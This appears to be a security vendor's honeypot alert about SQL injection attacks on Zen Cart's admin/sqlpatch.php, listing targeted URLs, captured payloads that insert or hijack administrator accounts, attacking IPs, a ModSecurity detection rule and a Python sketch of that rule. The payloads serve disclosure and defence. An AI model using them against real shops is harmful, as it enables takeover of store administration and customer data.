[Honeypot Alert] Zen Cart 'admin/sqlpatch.php' SQL Injection Attacks

Our web honeypot sensors picked up attacks aimed at exploiting a Zen Cart SQL Injection vulnerability.

[Screenshot of the honeypot sensor log, captured 2012-03-14]

The attacks send a POST request to the following URLs:

POST /admin/sqlpatch.php/password_forgotten.php?action=execute
POST /black_market/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /cart/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /product_info.php/products_id/1658/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shop/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /shopping/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /store/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tienda/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /tradeshow/admin/sqlpatch.php/password_forgotten.php?action=execute
POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute

The attacks carry a POST body parameter named "query_string" that contained the following payloads:

insert into `admin` ( `admin_id`, `admin_name`, `admin_email`, `admin_pass`, `admin_level` ) values ( '2112', 'jembot', 'adm.net', 'abc22a464d79887aeb11486b74081fb5:3d', '0' );'
insert into admin (admin_id, admin_name, admin_email, admin_pass) values (666, 'nobody', 'crew.tools43@yahoo.com', '21232f297a57a5a743894a0e4a801fc3:be');'
insert into admin values (12, 'sales', 'admin@localhost', '351683ea4e19efe34874b501fdbf9792:9b', 1);'
show tables;'
update admin set admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' where admin_id='1';'

As you can see, the attacker(s) are attempting to insert new administrator accounts into the "admin" table of the back-end Zen Cart database (and, in the last payload, to take over the existing admin_id 1 account by overwriting its name, e-mail and password hash).

There were a total of 116 attack requests detected from 4 source IP addresses:

125.165.165.31
173.230.128.50
193.107.86.145
209.239.114.225

These attacks are identified by the following ModSecurity rule from our SpiderLabs Commercial Rules Feed, which targets SQL Injection against this Zen Cart vulnerability:

## (2055343) ModSecurity Rules from Trustwave SpiderLabs: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection
SecRule REQUEST_LINE "@contains admin/sqlpatch.php" "chain,phase:2,block,rev:'031312',t:none,t:urlDecodeUni,capture,logdata:'%{args.query_string}',severity:'2',id:2055343,msg:'SLR: Zen Cart admin/sqlpatch.php query_string Parameter SQL Injection',tag:'WEB_ATTACK/SQL_INJECTION',tag:'http://osvdb.org/show/osvdb/55343'"
    SecRule "ARGS:query_string" "@pm # \" /* */ ` ' ( ) ; --" "ctl:auditLogParts=+E"
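To show how the chained rule decides, here is an added Python example (not the post's or Trustwave's code) that applies the same two-stage logic to a few constructed honeypot request records: stage one requires admin/sqlpatch.php in the request line, stage two requires one of the rule's @pm tokens in the decoded query_string argument. The `unquote` call only approximates t:urlDecodeUni, and the sample requests and hash value are constructed, not captured.

```python
from typing import Optional
from urllib.parse import parse_qs, unquote

# Phrase list from the rule's second SecRule ("@pm # \" /* */ ` ' ( ) ; --").
SQLI_TOKENS = ['#', '"', '/*', '*/', '`', "'", '(', ')', ';', '--']


def matches_rule(request_line: str, body: str) -> Optional[dict]:
    """Return match details if both stages of the chained rule fire, else None."""
    # Stage 1: REQUEST_LINE "@contains admin/sqlpatch.php" (URL-decoded first).
    if 'admin/sqlpatch.php' not in unquote(request_line):
        return None
    # Stage 2: ARGS:query_string must contain at least one @pm token.
    # parse_qs decodes '+' and %XX escapes, like ModSecurity's argument parsing.
    args = parse_qs(body, keep_blank_values=True)
    for payload in args.get('query_string', []):
        hits = [tok for tok in SQLI_TOKENS if tok in payload]
        if hits:
            return {'query_string': payload, 'tokens': hits}
    return None


def scan(records):
    """Run the rule over (request_line, body) pairs; return (index, match) per hit."""
    hits = []
    for i, (request_line, body) in enumerate(records):
        match = matches_rule(request_line, body)
        if match:
            hits.append((i, match))
    return hits


# Constructed sample traffic: two attack requests and three non-matching ones.
SAMPLE_RECORDS = [
    ("POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1",
     "query_string=insert+into+admin+values+%2812%2C+%27sales%27%2C+%27admin%40localhost%27"
     "%2C+%27HASHPLACEHOLDER%3A9b%27%2C+1%29%3B%27"),
    ("GET /index.php?main_page=index HTTP/1.1", ""),
    ("POST /zencart/admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1",
     "query_string=show+tables%3B%27"),
    # Stage 2 would fire, but stage 1 does not: the chain requires both.
    ("POST /contact_us.php HTTP/1.1", "query_string=it%27s+fine"),
    # Stage 1 fires, but the argument carries none of the @pm tokens.
    ("POST /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1",
     "query_string=select+1"),
]

if __name__ == '__main__':
    for idx, match in scan(SAMPLE_RECORDS):
        print(f"record {idx}: tokens={match['tokens']} payload={match['query_string']!r}")
```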
